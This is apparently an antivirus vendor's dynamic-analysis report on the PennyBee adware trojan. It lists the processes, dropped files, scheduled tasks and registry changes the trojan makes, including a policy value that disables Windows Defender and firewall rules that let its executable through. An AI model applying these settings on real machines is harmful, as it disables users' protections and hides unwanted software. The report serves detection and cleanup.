Gen.Variant.Adware.PennyBee.6_fe4e0a2705 – Adaware

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:924
taeako.exe:900
taeako.exe:2352
taeako.exe:212
taeako.exe:972
taeako.exe:948
taeako.exe:2980
taeako.exe:2644
taeako.exe:1536
taeako.exe:544
taeako.exe:436
taedko.exe:1988

The Trojan injects its code into the following process(es):

taeako.exe:372
tae3ko.exe:1932
taedko.exe:1604
dag17797.exe:552

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:924 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.dll (39329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\utaujte.js (1447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (101002 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\adblocker_installer__1441686123.txt (16441 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (4 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\jquery4toolbar.js (3312 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe (13368 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3kod.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\khkiaff.js (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\TrayIcons\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (569 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6kod.dll (39329 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\utils.exe (9527 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewko.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeadko.bnp (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\khkiaff.js (1856 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\utaujte.js (1447 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewdko.bnp (6584 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\jquery4toolbar.js (3312 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (0 bytes)

The process taeako.exe:212 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (574 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (1156 bytes)

The process taeako.exe:372 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\Tempo Runner tae3ko.job (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe (1509 bytes)
%WinDir%\Tasks\Tempo Runner tae6ko.job (8112 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (1528 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (2704 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (920 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (3072 bytes)

The Trojan deletes the following file(s):

%WinDir%\Tasks\Tempo Runner tae6ko.job (0 bytes)
%WinDir%\Tasks\Tempo Runner tae3ko.job (0 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (0 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (0 bytes)

The process taedko.exe:1604 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\lgv[1].js (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cmp_ext[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\obbgint[1].js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58 (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ammbg[1].js (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6 (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cxeappconf[1].js (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\getcc[1].php (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8 (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\v1[1].htm (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ammapp[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_gb (32 bytes)

The process taedko.exe:1988 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\loader[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_expire (13 bytes)

The process dag17797.exe:552 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\SecondResult.txt (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_422.html (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsDialogs.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd4.tmp (0 bytes)

Registry activity

The process %original file name%.exe:924 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"Publisher" = "adblocker"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\fe4e0a2705e5b15832079b300c83de5e\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayVersion" = "1.1.0.31"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"SetupType" = "71070"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayIcon" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayName" = "adblocker"
"UninstallString" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe /ga=1503 /ai=121 /bi=0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 9F 63 AB DB 79 36 DA 6C 40 E6 3A F2 0F 8F B5"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\fe4e0a2705e5b15832079b300c83de5e\DEBUG]
"Trace Level"

The process taeako.exe:900 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 37 C8 BF 8A 63 02 AF 3F D8 06 6E 13 2C 9C 27"

The process taeako.exe:2352 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 13 E6 58 A6 E0 D4 77 FB 5D 8E 1E C5 21 CF AA"

The process taeako.exe:212 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\taeako\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"InstallDate" = "140526"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{661088FE-EBD0-4612-8C1E-C282158A658C}" = "v2.10|Action=Allow|Active=TRUE|Dir=In|App=%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe|Name=odufaik|"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 4B D6 B5 AE 9F B4 F3 2E 8A C5 85 0C 1A FD 33"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{661088FE-EBD0-4612-8C1E-C282158A658C}" = "v2.10|Action=Allow|Active=TRUE|Dir=In|App=%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe|Name=odufaik|"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\IlejwTivc]
"taeako.exe" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe:*:Enabled:odufaik"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\IlejwTivc]
"taeako.exe" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe:*:Enabled:odufaik"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\taeako\DEBUG]
"Trace Level"

The process taeako.exe:972 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 38 B2 83 50 39 6E C0 71 A4 69 D3 07 67 CE 28"

The process taeako.exe:948 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 7B C0 15 9B 16 8B 6E 90 07 D7 4A 29 ED 3A AF"

The process taeako.exe:2980 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 3F 72 81 8B 2A B7 25 C3 9B 28 0C A7 2E 9E 33"

The process taeako.exe:2644 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB BF 99 9A 97 CA 44 28 A6 55 D2 69 96 B0 02 7C"

The process taeako.exe:1536 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 74 BF C4 76 F0 2C DA 5B 97 7A 2B 1F 99 0F 21"

The process taeako.exe:544 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 6D 06 43 63 FE 46 50 E7 CA FD 00 67 AD E6 CD"

The process taeako.exe:436 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 90 A8 A8 34 93 CE AF 65 94 DA 06 09 05 47 93"

The process taeako.exe:372 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 CD BE 57 BF 26 58 D1 B5 5E 09 03 26 10 47 F9"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\121_31]
"AMMDCS" = "1503"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process tae3ko.exe:1932 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 26 9A 4F 50 C8 5E 2F 44 B0 5B AD C9 05 D6 1A"

The process taedko.exe:1604 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"AAD4DBA9766467aob23" = "60000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"S132B7B8F1DC15ob23" = "12"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"__cxe_type" = ".10100019"
"CAD4DBA9766467bducob23" = "18000000"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"cmpcc" = "UA"

